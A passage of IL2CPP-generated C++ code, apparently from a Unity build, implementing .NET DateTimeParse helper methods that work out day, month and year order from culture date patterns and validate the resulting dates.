DateTimeParse_GetDayOfNM_mB0820186EBFA26130280E286785383C03A8C7277 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfNM_mB0820186EBFA26130280E286785383C03A8C7277_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = ___dtfi3; String_t* L_4 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_3, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_5 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_6 = DateTimeParse_GetMonthDayOrder_mBB4BC48898E898A22EB1F203AEE286ED77CE9583(L_4, L_5, (int32_t*)(&V_0), /*hidden argument*/NULL); if (L_6) { goto IL_0041; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_7 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = ___dtfi3; String_t* L_9 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_8, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_7, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_9, /*hidden argument*/NULL); return (bool)0; } IL_0041: { int32_t L_10 = V_0; if ((!(((uint32_t)L_10) == ((uint32_t)6)))) { goto IL_009f; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi3; String_t* L_12 = DateTimeFormatInfo_get_YearMonthPattern_m58DC71FC083C4CBF5C2856140BEE5EC705AA5034(L_11, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_14 = DateTimeParse_GetYearMonthOrder_mEDFBD53F46F78F077914D6D042E63B05FF79608C(L_12, L_13, (int32_t*)(&V_1), /*hidden argument*/NULL); if (L_14) { goto IL_0069; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_16 = ___dtfi3; String_t* L_17 = DateTimeFormatInfo_get_YearMonthPattern_m58DC71FC083C4CBF5C2856140BEE5EC705AA5034(L_16, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_15, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_17, /*hidden argument*/NULL); return (bool)0; } IL_0069: { int32_t L_18 = V_1; if ((!(((uint32_t)L_18) == ((uint32_t)4)))) { goto IL_009f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_19 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_20 = ___raw2; int32_t L_21 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_20, 0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_22 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_19, L_21, (int32_t*)(&V_2), /*hidden argument*/NULL); if (!L_22) { goto IL_008e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; int32_t L_24 = V_2; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_25 = ___raw2; int32_t L_26 = L_25->get_month_2(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_23, L_24, L_26, 1, /*hidden argument*/NULL); if (L_27) { goto IL_009d; } } IL_008e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_28, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_009d: { return (bool)1; } IL_009f: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_29 = ___result0; int32_t* L_30 = ___styles1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_29, (int32_t*)L_30, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_31 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result0; int32_t L_33 = L_32->get_Year_0(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_34 = ___raw2; int32_t L_35 = L_34->get_month_2(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_36 = ___raw2; int32_t L_37 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_36, 0, /*hidden argument*/NULL); bool L_38 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_31, L_33, L_35, L_37, /*hidden argument*/NULL); if (L_38) { goto IL_00d0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_39 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_39, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00d0: { return (bool)1; } } // System.Boolean System.DateTimeParse::GetDayOfMNN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfMNN_m7D023A76508B02690AA381F1808836EFC86B3374 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfMNN_m7D023A76508B02690AA381F1808836EFC86B3374_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw1; int32_t L_4 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_3, 0, /*hidden argument*/NULL); V_0 = L_4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw1; int32_t L_6 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_5, 1, /*hidden argument*/NULL); V_1 = L_6; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_7 = ___dtfi2; String_t* L_8 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_7, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_10 = DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776(L_8, L_9, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_10) { goto IL_0051; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_11 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_12 = ___dtfi2; String_t* L_13 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_12, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_11, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_13, /*hidden argument*/NULL); return (bool)0; } IL_0051: { int32_t L_14 = V_2; if ((!(((uint32_t)L_14) == ((uint32_t)1)))) { goto IL_00e8; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result0; int32_t L_16 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_17 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_15, L_16, (int32_t*)(&V_3), /*hidden argument*/NULL); if (!L_17) { goto IL_009d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_18 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_19 = L_18->get_calendar_10(); int32_t L_20 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_21 = ___raw1; int32_t L_22 = L_21->get_month_2(); int32_t L_23 = V_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_24 = ___result0; int32_t L_25 = L_24->get_era_7(); bool L_26 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_19, L_20, L_22, L_23, L_25); if (!L_26) { goto IL_009d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_27 = ___result0; int32_t L_28 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_29 = ___raw1; int32_t L_30 = L_29->get_month_2(); int32_t L_31 = V_0; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_27, L_28, L_30, L_31, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result0; int32_t* L_33 = L_32->get_address_of_flags_8(); int32_t* L_34 = L_33; int32_t L_35 = *((int32_t*)L_34); *((int32_t*)L_34) = (int32_t)((int32_t)((int32_t)L_35|(int32_t)((int32_t)128))); return (bool)1; } IL_009d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_36 = ___result0; int32_t L_37 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_38 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_36, L_37, (int32_t*)(&V_3), /*hidden argument*/NULL); if (!L_38) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_39 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_40 = L_39->get_calendar_10(); int32_t L_41 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_42 = ___raw1; int32_t L_43 = L_42->get_month_2(); int32_t L_44 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_45 = ___result0; int32_t L_46 = L_45->get_era_7(); bool L_47 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_40, L_41, L_43, L_44, L_46); if (!L_47) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_48 = ___result0; int32_t L_49 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_50 = ___raw1; int32_t L_51 = L_50->get_month_2(); int32_t L_52 = V_1; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_48, L_49, L_51, L_52, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_53 = ___result0; int32_t* L_54 = L_53->get_address_of_flags_8(); int32_t* L_55 = L_54; int32_t L_56 = *((int32_t*)L_55); *((int32_t*)L_55) = (int32_t)((int32_t)((int32_t)L_56|(int32_t)((int32_t)128))); return (bool)1; } IL_00e8: { int32_t L_57 = V_2; if (L_57) { goto IL_017e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_58 = ___result0; int32_t L_59 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_60 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_58, L_59, (int32_t*)(&V_3), /*hidden argument*/NULL); if (!L_60) { goto IL_0133; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_61 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_62 = L_61->get_calendar_10(); int32_t L_63 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_64 = ___raw1; int32_t L_65 = L_64->get_month_2(); int32_t L_66 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_67 = ___result0; int32_t L_68 = L_67->get_era_7(); bool L_69 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_62, L_63, L_65, L_66, L_68); if (!L_69) { goto IL_0133; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_70 = ___result0; int32_t L_71 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_72 = ___raw1; int32_t L_73 = L_72->get_month_2(); int32_t L_74 = V_1; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_70, L_71, L_73, L_74, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_75 = ___result0; int32_t* L_76 = L_75->get_address_of_flags_8(); int32_t* L_77 = L_76; int32_t L_78 = *((int32_t*)L_77); *((int32_t*)L_77) = (int32_t)((int32_t)((int32_t)L_78|(int32_t)((int32_t)128))); return (bool)1; } IL_0133: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_79 = ___result0; int32_t L_80 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_81 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_79, L_80, (int32_t*)(&V_3), /*hidden argument*/NULL); if (!L_81) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_82 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_83 = L_82->get_calendar_10(); int32_t L_84 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_85 = ___raw1; int32_t L_86 = L_85->get_month_2(); int32_t L_87 = V_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_88 = ___result0; int32_t L_89 = L_88->get_era_7(); bool L_90 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_83, L_84, L_86, L_87, L_89); if (!L_90) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_91 = ___result0; int32_t L_92 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_93 = ___raw1; int32_t L_94 = L_93->get_month_2(); int32_t L_95 = V_0; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_91, L_92, L_94, L_95, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_96 = ___result0; int32_t* L_97 = L_96->get_address_of_flags_8(); int32_t* L_98 = L_97; int32_t L_99 = *((int32_t*)L_98); *((int32_t*)L_98) = (int32_t)((int32_t)((int32_t)L_99|(int32_t)((int32_t)128))); return (bool)1; } IL_017e: { int32_t L_100 = V_2; if ((!(((uint32_t)L_100) == ((uint32_t)2)))) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_101 = ___result0; int32_t L_102 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_103 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_101, L_102, (int32_t*)(&V_3), /*hidden argument*/NULL); if (!L_103) { goto IL_01ca; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_104 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_105 = L_104->get_calendar_10(); int32_t L_106 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_107 = ___raw1; int32_t L_108 = L_107->get_month_2(); int32_t L_109 = V_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_110 = ___result0; int32_t L_111 = L_110->get_era_7(); bool L_112 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_105, L_106, L_108, L_109, L_111); if (!L_112) { goto IL_01ca; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_113 = ___result0; int32_t L_114 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_115 = ___raw1; int32_t L_116 = L_115->get_month_2(); int32_t L_117 = V_0; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_113, L_114, L_116, L_117, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_118 = ___result0; int32_t* L_119 = L_118->get_address_of_flags_8(); int32_t* L_120 = L_119; int32_t L_121 = *((int32_t*)L_120); *((int32_t*)L_120) = (int32_t)((int32_t)((int32_t)L_121|(int32_t)((int32_t)128))); return (bool)1; } IL_01ca: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_122 = ___result0; int32_t L_123 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_124 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_122, L_123, (int32_t*)(&V_3), /*hidden argument*/NULL); if (!L_124) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_125 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_126 = L_125->get_calendar_10(); int32_t L_127 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_128 = ___raw1; int32_t L_129 = L_128->get_month_2(); int32_t L_130 = V_1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_131 = ___result0; int32_t L_132 = L_131->get_era_7(); bool L_133 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_126, L_127, L_129, L_130, L_132); if (!L_133) { goto IL_020f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_134 = ___result0; int32_t L_135 = V_3; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_136 = ___raw1; int32_t L_137 = L_136->get_month_2(); int32_t L_138 = V_1; DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_134, L_135, L_137, L_138, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_139 = ___result0; int32_t* L_140 = L_139->get_address_of_flags_8(); int32_t* L_141 = L_140; int32_t L_142 = *((int32_t*)L_141); *((int32_t*)L_141) = (int32_t)((int32_t)((int32_t)L_142|(int32_t)((int32_t)128))); return (bool)1; } IL_020f: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_143 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_143, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfYNN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYNN_m60CC9772F4E33623D3ADA795C58851E23EA490E7 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfYNN_m60CC9772F4E33623D3ADA795C58851E23EA490E7_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw1; int32_t L_4 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_3, 0, /*hidden argument*/NULL); V_0 = L_4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw1; int32_t L_6 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_5, 1, /*hidden argument*/NULL); V_1 = L_6; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_7 = ___dtfi2; String_t* L_8 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_7, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_10 = DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776(L_8, L_9, (int32_t*)(&V_2), /*hidden argument*/NULL); if (!L_10) { goto IL_0062; } } { int32_t L_11 = V_2; if ((!(((uint32_t)L_11) == ((uint32_t)3)))) { goto IL_0062; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_13 = ___raw1; int32_t L_14 = L_13->get_year_3(); int32_t L_15 = V_1; int32_t L_16 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_17 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_12, L_14, L_15, L_16, /*hidden argument*/NULL); if (!L_17) { goto IL_0083; } } { 